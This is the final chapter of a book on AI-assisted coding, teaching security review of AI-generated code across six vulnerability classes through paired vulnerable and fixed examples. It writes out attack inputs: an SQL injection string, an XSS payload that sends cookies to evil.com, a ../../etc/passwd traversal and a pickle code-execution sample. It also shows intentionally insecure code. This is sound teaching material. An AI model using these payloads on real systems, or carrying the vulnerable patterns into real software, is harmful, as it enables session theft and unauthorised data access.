Chapter 18: Security Review of AI-Generated Code — Complete Guide to 6 Vulnerability Classes
AI errors are not random — they follow patterns. Training data is full of unsafe legacy code; AI prefers the shortest path, and secure implementations require extra steps. This chapter shows 6 recurring vulnerability classes with runnable wrong-and-right code examples for each, plus detection methods, .cursorrules prevention rules, a reusable AI security review Prompt, and a 20-item checklist.
Chapter goals: Recognize SQL injection, XSS, secret leakage, path traversal, insecure deserialization, and missing authorization in AI-generated code; apply the fix pattern for each; use the AI security review Prompt and 20-item checklist in your team's workflow.
Why AI-Generated Code Has Specific Security Problems
Three root causes — not random noise:
- Training data bias: Stack Overflow and GitHub examples routinely omit security checks ("make it work first"). AI learned those patterns.
- Shortest-path preference: AI gravitates toward the minimal implementation. Parameterized queries, path validation, and authorization checks all require extra code — AI skips them unless explicitly asked.
- No threat model awareness: AI doesn't know whether a variable comes from user input or an internal system, so it can't judge whether validation is needed.
Conclusion: AI code must go through a security review, especially code that handles user input, file operations, and database queries.
Vulnerability 1: SQL Injection (Most Common, Highest Impact)
Wrong — string-concatenated SQL
def get_user(username: str):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    return db.execute(query)
# Attacker input: ' OR '1'='1
# Executed: SELECT * FROM users WHERE username = '' OR '1'='1'
# Result: returns all users, authentication bypassed
Correct — parameterized queries
# Option 1: Parameterized query (DB-API)
def get_user(username: str):
    return db.execute("SELECT * FROM users WHERE username = :username",
                      {"username": username})
# Option 2: ORM (preferred: values are sent as bound parameters automatically)
def get_user_orm(username: str, db: Session):
    return db.query(User).filter(User.username == username).first()
# Option 3: Dynamic column names: use an allowlist, never raw input
ALLOWED = {"username", "email"}
def get_by_field(field: str, value: str):
    if field not in ALLOWED:
        raise ValueError(f"Invalid field: {field}")
    # Interpolating field is safe only because it was checked against ALLOWED
    return db.execute(f"SELECT * FROM users WHERE {field} = :v", {"v": value})
.cursorrules rule: "All database queries must use parameterized queries or ORM. String concatenation for SQL is forbidden."
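To see the difference between the two versions concretely, here is a minimal, self-contained sketch using Python's built-in sqlite3 module with an in-memory database. The table layout, the sample rows, and the function names get_user_unsafe and get_user_safe are assumptions made for illustration; the chapter's own db object is not shown, so this does not reproduce it.

```python
import sqlite3

# Hypothetical schema and rows, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany("INSERT INTO users (username) VALUES (?)",
                 [("alice",), ("bob",)])

def get_user_unsafe(username: str):
    # Vulnerable: the input becomes part of the SQL text itself.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()

def get_user_safe(username: str):
    # Safe: the driver binds the value, so it is never parsed as SQL.
    return conn.execute(
        "SELECT username FROM users WHERE username = :username",
        {"username": username},
    ).fetchall()

payload = "' OR '1'='1"
unsafe_rows = get_user_unsafe(payload)  # the WHERE clause is always true
safe_rows = get_user_safe(payload)      # no user has this literal name
```

With the same attacker input, the concatenated query returns every row, while the parameterized query treats the payload as an ordinary (nonexistent) username and returns nothing.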
Vulnerability 2: XSS (React-Specific Risk)
React auto-escapes JSX text content, but dangerouslySetInnerHTML bypasses that entirely. AI uses it for "convenient rich text rendering" without considering the data source.
Wrong — dangerouslySetInnerHTML on user input
function UserComment({ comment }: { comment: string }) {
  return <div dangerouslySetInnerHTML={{ __html: comment }} />;
  // If comment is user-controlled: instant XSS
  // Attacker: <img src=x onerror="fetch('https://evil.com/?c='+document.cookie)">
  // (a <script> tag inserted via innerHTML does not run, but event-handler attributes do)
}
Correct — text render or DOMPurify sanitize
// Option 1: plain text — React auto-escapes (use for 90% of cases)
function UserComment({ comment }: { comment: string }) {
  return <div>{comment}</div>;
}
// Option 2: must render HTML — sanitize first
import DOMPurify from 'dompurify';
function RichComment({ html }: { html: string }) {
  const clean = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
    ALLOWED_ATTR: ['href', 'target']
  });
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
Vulnerability 3: Hardcoded Secrets
AI fills in real-looking API keys in "example" code. You commit without looking carefully, push to GitHub, and bots find and try the credentials within minutes.
Wrong — secrets in source code
stripe.api_key = "sk_live_abc123xxxxxxxxxxxxxxxxxxxxxxxx"
JWT_SECRET = "mysecretkey123"
DATABASE_URL = "postgresql://admin:[email protected]/mydb"
Correct — all secrets from environment variables
import os
import stripe
from dotenv import load_dotenv  # .env must be in .gitignore
load_dotenv()
# Validate first, so a single error lists every missing or empty variable
REQUIRED = ["STRIPE_SECRET_KEY", "JWT_SECRET", "DATABASE_URL"]
missing = [k for k in REQUIRED if not os.environ.get(k)]
if missing:
    raise EnvironmentError(f"Missing required env vars: {missing}")
# Use [] not .get(): fail loudly if a key is missing
stripe.api_key = os.environ["STRIPE_SECRET_KEY"]
JWT_SECRET = os.environ["JWT_SECRET"]
DATABASE_URL = os.environ["DATABASE_URL"]
Add gitleaks to your pre-commit hooks to auto-scan staged changes for secrets before every commit.
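To make clear what such a scan looks for, here is a minimal sketch of the kind of pattern matching a secret scanner performs. The two patterns and the scan function are simplified assumptions written for this example; they are not gitleaks' actual rule set, which is much larger and also uses entropy checks.

```python
import re

# Simplified, hypothetical patterns. Real scanners such as gitleaks ship
# far larger rule sets; these two only illustrate the idea.
PATTERNS = {
    "stripe_live_key": re.compile(r"sk_live_[0-9a-zA-Z]{16,}"),
    "quoted_secret_assignment": re.compile(
        r"(?i)\b\w*(secret|password|token)\w*\s*=\s*[\"'][^\"']{8,}[\"']"
    ),
}

def scan(text: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for every line that matches a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings

sample = '''stripe.api_key = "sk_live_abc123xxxxxxxxxxxxxxxxxxxxxxxx"
JWT_SECRET = "mysecretkey123"
JWT_SECRET = os.environ["JWT_SECRET"]
'''
findings = scan(sample)  # flags lines 1 and 2, not the env-var lookup on line 3
```

A hand-rolled scanner like this is no substitute for a maintained tool; it only shows why the hardcoded lines above are easy for bots to find and why the environment-variable version passes.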
Vulnerability 4: Path Traversal
AI concatenates user input directly into file paths. Attackers use ../../ to escape the intended directory and read system files.
Wrong — user input concatenated into file path
@app.get("/files/{filename}")
def read_file(filename: str):
    path = f"/app/uploads/{filename}"
    return open(path).read()
# Attack: GET /files/../../etc/passwd → reads /etc/passwd
Correct — normalize and verify path stays within bounds
import re
from pathlib import Path
from fastapi import FastAPI, HTTPException
app = FastAPI()
BASE = Path("/app/uploads").resolve()
@app.get("/files/{filename}")
def read_file(filename: str):
    # Step 1: allowlist, only safe characters (fullmatch also rejects a trailing newline)
    if not re.fullmatch(r'[a-zA-Z0-9._-]+', filename):
        raise HTTPException(400, "Invalid filename")
    # Step 2: resolve real path (eliminates ../ and follows symlinks)
    path = (BASE / filename).resolve()
    # Step 3: verify real path is inside the base directory.
    # is_relative_to (Python 3.9+) compares path components; a string-prefix
    # check would also accept a sibling such as /app/uploads_private.
    if not path.is_relative_to(BASE):
        raise HTTPException(403, "Access denied")
    # is_file() also rejects directories, e.g. "." resolving to BASE itself
    if not path.is_file():
        raise HTTPException(404, "Not found")
    return path.read_text()
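The boundary check is the step most worth testing in isolation. The sketch below, which uses a temporary directory and hypothetical directory names (uploads, uploads_private), compares a component-wise check based on Path.is_relative_to (Python 3.9+) with a plain string-prefix comparison. The helper names is_inside and is_inside_prefix are assumptions for this example.

```python
import tempfile
from pathlib import Path

def is_inside(base: Path, user_path: str) -> bool:
    """True only if user_path, once resolved, stays inside base."""
    target = (base / user_path).resolve()
    return target.is_relative_to(base)  # Python 3.9+

def is_inside_prefix(base: Path, user_path: str) -> bool:
    """Naive string-prefix variant, shown only for comparison."""
    target = (base / user_path).resolve()
    return str(target).startswith(str(base))

with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp).resolve()
    base = root / "uploads"
    sibling = root / "uploads_private"  # shares the "uploads" prefix
    base.mkdir()
    sibling.mkdir()
    (base / "report.txt").write_text("ok")
    (sibling / "secret.txt").write_text("secret")

    normal = is_inside(base, "report.txt")
    escape = is_inside(base, "../../etc/passwd")
    sibling_strict = is_inside(base, "../uploads_private/secret.txt")
    sibling_prefix = is_inside_prefix(base, "../uploads_private/secret.txt")
```

The component-wise check rejects both the classic ../../ escape and the sibling directory, while the prefix comparison accepts the sibling because its path string merely begins with the base path. A filename allowlist that forbids slashes hides this gap, but the boundary check should not depend on it.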
Vulnerability 5: Insecure Deserialization
Python's pickle can execute arbitrary code during deserialization, because a pickled payload may name any importable callable to be invoked on load. AI commonly suggests it for caching. If the data source is untrusted (a compromised Redis instance, data received over the network), it's a critical vulnerability.
Wrong — pickle on external data
import pickle, redis
r = redis.Redis()
def load_session(session_id: str):
    data = r.get(f"session:{session_id}")
    return pickle.loads(data) if data else None
# If an attacker can write to Redis, they can execute arbitrary code
Correct — JSON + Pydantic validation
import json, redis
from pydantic import BaseModel
class UserSession(BaseModel):
    user_id: int
    username: str
    roles: list[str]
r = redis.Redis()
def load_session(session_id: str) -> UserSession | None:
    data = r.get(f"session:{session_id}")
    if not data:
        return None
    return UserSession.model_validate_json(data)  # safe: parses data only, no code execution
def save_session(session_id: str, s: UserSession, ttl: int = 3600):
    r.setex(f"session:{session_id}", ttl, s.model_dump_json())
Rule: Never use pickle.loads() on data that crosses a trust boundary — network data, user input, Redis cache, or any external storage.
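The following standard-library sketch shows why that rule matters. The Payload class is a hypothetical stand-in for attacker-controlled data, and the harmless eval("6 * 7") stands in for whatever command a real attacker would run; neither comes from the chapter's own code.

```python
import json
import pickle

class Payload:
    """Hypothetical attacker-controlled object."""
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call eval('6 * 7')".
        # A real attacker would name os.system or similar instead.
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # eval runs here, during loading

# JSON parsing only builds dicts, lists, strings, numbers, booleans and None.
session = json.loads('{"user_id": 1, "username": "alice", "roles": ["user"]}')

try:
    json.loads(blob)  # the pickle payload is not valid JSON
    rejected = False
except ValueError:    # JSONDecodeError and UnicodeDecodeError both subclass ValueError
    rejected = True
```

Loading the blob returns the result of the attacker's call rather than a Payload instance, which is exactly the code-execution path described above. The JSON parser can only produce plain data, and it rejects the pickle bytes outright.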
Vulnerability 6: Missing Authorization
AI generates endpoint logic but forgets authorization checks. Any logged-in user can access any other user's data.
Wrong — checks login but not ownership
@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user=Depends(get_current_user)):
    # Verifies login, but any logged-in user can query any user_id
    return db.query(Order).filter(Order.user_id == user_id).all()
Correct — verify ownership before returning data
@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user: User = Depends(get_current_user)):
    if current_user.id != user_id and not current_user.is_admin:
        raise HTTPException(403, "Access denied")
    return db.query(Order).filter(Order.user_id == user_id).all()
# Better: eliminate the parameter entirely and use current_user.id directly
@app.get("/api/my/orders")
def get_my_orders(current_user: User = Depends(get_current_user)):
    return db.query(Order).filter(Order.user_id == current_user.id).all()
# No user_id in URL = no IDOR risk at all
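Ownership checks are easy to regress, so it helps to pin the rule down in a test. The sketch below is framework-free: the User dataclass, the Forbidden exception (a stand-in for HTTPException(403)), the in-memory ORDERS list, and the can_read helper are all assumptions made for illustration, since the chapter's real models and database session are not shown.

```python
from dataclasses import dataclass

@dataclass
class User:
    # Hypothetical minimal user model.
    id: int
    is_admin: bool = False

class Forbidden(Exception):
    """Stand-in for HTTPException(403) so the sketch runs without FastAPI."""

ORDERS = [  # hypothetical in-memory data in place of the orders table
    {"id": 1, "user_id": 1, "item": "book"},
    {"id": 2, "user_id": 2, "item": "lamp"},
]

def get_orders(user_id: int, current_user: User) -> list[dict]:
    # Same rule as the endpoint: owner or admin only.
    if current_user.id != user_id and not current_user.is_admin:
        raise Forbidden("Access denied")
    return [o for o in ORDERS if o["user_id"] == user_id]

def can_read(user_id: int, current_user: User) -> bool:
    """Report whether current_user may read user_id's orders."""
    try:
        get_orders(user_id, current_user)
        return True
    except Forbidden:
        return False

alice, bob, admin = User(1), User(2), User(99, is_admin=True)
owner_ok = can_read(1, alice)      # owner reads own orders
stranger_ok = can_read(1, bob)     # another logged-in user is refused
admin_ok = can_read(1, admin)      # admin override
```

The middle case is the IDOR test: a second, valid, logged-in user requesting the first user's ID. A test suite that only ever uses one account cannot catch this class of bug.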
AI Security Review Prompt
You are a security engineer. Review the following code for security issues.
Priority checklist (in order):
1. Database queries: are all using parameterized queries? Any string-concatenated SQL?
2. User input handling: is all untrusted data validated before use?
3. File operations: is the path normalized and verified to stay within the allowed directory?
4. Authorization: does every protected endpoint verify both authentication AND ownership?
5. Secrets: are all credentials read from environment variables? Any hardcoded?
6. Deserialization: is pickle/eval/exec used on data from the network or user input?
Report only real issues. For each finding include:
- File name and line number
- Vulnerability type
- Attack scenario in one sentence
- Working fix code (the correct implementation)
@[file to review]
20-Item Security Checklist for AI-Generated Code
| # | Check item | Level |
|---|---|---|
| 1 | All SQL queries use parameterized queries or ORM — no string concatenation | Must |
| 2 | User input validated before use (Pydantic / Zod / regex) | Must |
| 3 | No secrets, passwords, or tokens hardcoded in source (scan git log) | Must |
| 4 | File path operations are normalized and boundary-checked | Must |
| 5 | Every API endpoint verifies authorization — not just authentication | Must |
| 6 | Error responses don't leak stack traces, DB schema, or internal IPs | Must |
| 7 | pickle/eval/exec not used on network data or user input | Must |
| 8 | All API communication uses HTTPS; no plaintext sensitive data in transit | Must |
| 9 | Passwords hashed with bcrypt or argon2 — not MD5/SHA1 | Must |
| 10 | JWT signature algorithm and secret verified correctly; alg:none rejected | Must |
| 11 | Debug mode disabled in production; detailed error pages off | Must |
| 12 | Rate limiting on APIs to mitigate brute-force and denial-of-service attempts | Recommended |
| 13 | CSRF tokens on state-changing operations (POST/PUT/DELETE) | Recommended |
| 14 | Dependencies updated regularly; pip-audit / npm audit runs in CI | Recommended |
| 15 | Logs don't record passwords, tokens, or full credit card numbers | Recommended |
| 16 | Uploaded files validated for type (MIME + extension) and size | Recommended |
| 17 | Database connections use a least-privilege account — not root | Recommended |
| 18 | Sensitive operations (delete, payment, permission change) have audit logs | Recommended |
| 19 | Third-party CDN scripts use Subresource Integrity (SRI) verification | Recommended |
| 20 | Penetration testing done periodically, especially before major feature launches | Recommended |
Chapter Key Points — and a Note to Close the Book
- AI code must be security-reviewed: The vulnerability patterns are predictable — SQL injection, XSS, and hardcoded secrets are the top three. Add this chapter's checklist to your PR template and run through it before every merge.
- Security rules in .cursorrules are the highest-leverage prevention: Better to prevent than detect. Three rules (no SQL concatenation, no dangerouslySetInnerHTML on user input, all secrets from env vars) head off a large share of AI-generated security issues before code is even written.
- Path traversal and missing authorization are the most overlooked: SQL injection awareness is now common; path traversal (Path.resolve + boundary check) and IDOR (URL parameter replaced with another user's ID) still appear frequently in AI-generated code.
- Use gitleaks as a pre-commit hook: Once a secret is pushed, it may already be compromised. Local scanning before commit is the last line of defense. Five minutes to configure, prevents major incidents.
- AI makes coding faster — and mistakes faster too: Build security awareness, establish team standards, review regularly. Do those three things and AI is a genuine force multiplier. Skip them and it's a liability. All 18 chapters of this book have given you the tools, techniques, and workflows — what follows is practice and iteration in real projects.
End of book: From Chapter 1 ("Why the AI Coding Era") to Chapter 18 ("AI Code Security Review"), this book has covered everything from setup to production deployment. The AI coding landscape will keep evolving — staying curious and practicing deliberately is the only way to keep up.